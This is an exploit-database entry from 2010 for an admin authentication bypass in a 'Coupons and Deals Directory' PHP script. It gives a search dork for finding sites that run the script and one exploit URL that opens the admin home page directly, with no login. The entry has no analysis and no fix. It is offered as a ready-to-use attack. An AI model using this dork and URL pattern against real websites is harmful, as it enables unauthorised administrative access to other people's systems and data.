id: 11000
date: 02/20/2010
title: Coupons By Pass Admin Vulnerability
author: indoushka
cves: 

===================================
Coupons By Pass Admin Vulnerability
===================================

========================================================================================                  
| # Title    : Coupons By Pass Admin Vulnerability      
| # Author   : indoushka                                                                                                        
| # Web Site :                                                                                                                             
| # Dork     : Copyright 2007. Coupons and Deals Directory                        
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       
| # Bug      : By Pass Admin                                                                     
======================      Exploit By indoushka       =================================
# Exploit  : 
 
http://127.0.0.1/couponscript/admin/adminhome.php?pg=1&msg=welcome%20admin




#  0day.today [2023-03-24]  #